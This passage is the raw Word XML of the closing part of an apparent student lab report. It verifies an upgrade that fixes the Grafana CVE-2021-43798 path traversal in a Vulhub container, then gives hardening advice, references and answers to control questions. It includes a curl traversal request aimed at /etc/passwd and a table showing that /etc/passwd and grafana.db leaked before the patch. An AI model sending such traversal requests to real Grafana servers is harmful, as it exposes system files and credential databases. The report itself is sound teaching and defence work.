        <w:br/>
        <w:t xml:space="preserve">  web:</w:t>
        <w:br/>
        <w:t>-   image: vulhub/grafana:8.2.6</w:t>
        <w:br/>
        <w:t>+   image: grafana/grafana:8.3.1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - "3000:3000"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Grafana published the fix on 7 December 2021 in 8.3.1, 8.2.7, 8.1.8 and 8.0.7. Version 8.3.1 was chosen because it is the newest of the fixed releases for the 8.3 line. Port, configuration and access policy were left unchanged, so the only variable in the experiment is the Grafana version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.6 Verification of the fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>After the upgrade the same two requests were repeated, together with a regression check that the application still works:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3211"/>
        <w:gridCol w:w="3211"/>
        <w:gridCol w:w="3211"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Before (8.2.6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>After (8.3.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GET /login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200 - no regression</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>.../etc/passwd traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200 + /etc/passwd content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>404 {"message":"Plugin file not found"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>.../grafana.db traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200 + 659,456 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>404, 41 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GET /api/health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200, "version": "8.3.1", "database": "ok"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -s -o /dev/null -w "HTTP %{http_code}\n" http://127.0.0.1:3000/login</w:t>
        <w:br/>
        <w:t>HTTP 200</w:t>
        <w:br/>
        <w:br/>
        <w:t>curl -s --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/.../etc/passwd"</w:t>
        <w:br/>
        <w:t>{"message":"Plugin file not found"}   HTTP 404</w:t>
        <w:br/>
        <w:br/>
        <w:t>curl -s http://127.0.0.1:3000/api/health</w:t>
        <w:br/>
        <w:t>{"commit":"b9eacd93e9","database":"ok","version":"8.3.1"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3354539"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cve-fixed.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3354539"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Both attack requests are now rejected before the filesystem is touched, while the login page and the health endpoint still answer normally. The vulnerability is eliminated and the main functionality of the application is intact (no regression).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.7 Defence in depth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Never expose Grafana directly to the internet; put it behind a reverse proxy with authentication or restrict access by source address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Reject requests whose path contains .., %2e%2e or encoded slashes at the proxy or WAF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Run the container as a non-root user and with a read-only root filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Rotate the admin password and all datasource credentials if the host was exposed - a leaked grafana.db is equivalent to a compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Pin image digests in docker-compose.yml so that a silent re-tag cannot reintroduce a vulnerable build.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The work produced a small but complete secure backend: parameterised database access, output escaping, bcrypt password storage, JWT authentication with an expiry and a protected write endpoint, all covered by 16 automated tests and by a CI pipeline that runs SAST and SCA on every push.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The CVE part showed how a single missing containment check in a static-file handler turns into an unauthenticated arbitrary file read and, because of what the application stores on disk, into the theft of the administrator's password hash. Comparing the vulnerable and the patched environment demonstrated the complete cycle: reproduce, explain, patch, verify and harden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OWASP Top 10 - https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OWASP Cheat Sheet Series (SQL Injection Prevention, XSS Prevention) - https://cheatsheetseries.owasp.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JWT introduction - https://jwt.io/introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GitHub Actions documentation - https://docs.github.com/en/actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vulhub - https://github.com/vulhub/vulhub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vulhub environment used: grafana/CVE-2021-43798</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Grafana security release 8.3.1 / 8.2.7 / 8.1.8 / 8.0.7 - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NVD entry for CVE-2021-43798 - https://nvd.nist.gov/vuln/detail/CVE-2021-43798</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bandit - https://bandit.readthedocs.io/ ; pip-audit - https://pypi.org/project/pip-audit/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Source repository - https://github.com/xwssd/secure-api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A. Answers to the control questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. Why is bcrypt preferable to SHA-256 for passwords?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SHA-256 is a fast general-purpose hash: a GPU can test billions of candidates per second. bcrypt is deliberately slow, its cost factor is tunable and it salts every password automatically, so precomputed tables are useless and brute force becomes impractical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. What is the difference between SAST and DAST?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SAST analyses source code without running the application (bandit), so it points at the exact line but cannot see runtime configuration. DAST tests the running application through HTTP (OWASP ZAP), so it proves exploitability but cannot see the code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. How does a JWT work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A JWT has a header, a payload with claims (sub, username, exp) and a signature. The server signs header.payload with its secret (HS256) and recomputes the signature on each request, then checks exp and the required claims. The payload is readable by anyone, so it must not contain secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. What are the risks of not auditing dependencies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Most of a modern application is third-party code; an unpatched dependency with a known CVE gives code execution or data access without any bug in your own code. SCA tools such as pip-audit map the dependency tree against CVE databases and fail the pipeline before release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. What advantages do Docker and Vulhub give for studying security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The vulnerable service runs isolated, starts with one command and is removed with docker compose down, so an exploit cannot damage the host. Environments are reproducible, several versions can run side by side, and the vulnerable and patched images are easy to compare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. Vulnerability vs exploit - what was reproduced here?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The vulnerability is the weakness itself (the missing containment check in Grafana's plugin handler); the exploit is the crafted URL with ../ segments that abuses it. The exploit was reproduced against the vulnerable environment, then the vulnerability was removed by upgrading.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7. Why is regression testing critical after a patch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A patch changes behaviour and an over-restrictive fix can break legitimate requests. The upgrade was therefore checked with a normal request (login page 200, /api/health ok), proving the fix is both effective and safe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>8. How does the ability to reproduce CVEs help a security specialist?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>It turns a CVE entry into concrete evidence: which request triggers the flaw, what the attacker gains and what the traffic looks like. A pentester uses it to prove impact, a SOC analyst to write detection rules, an administrator to justify and verify the patch.</w:t>
      </w:r>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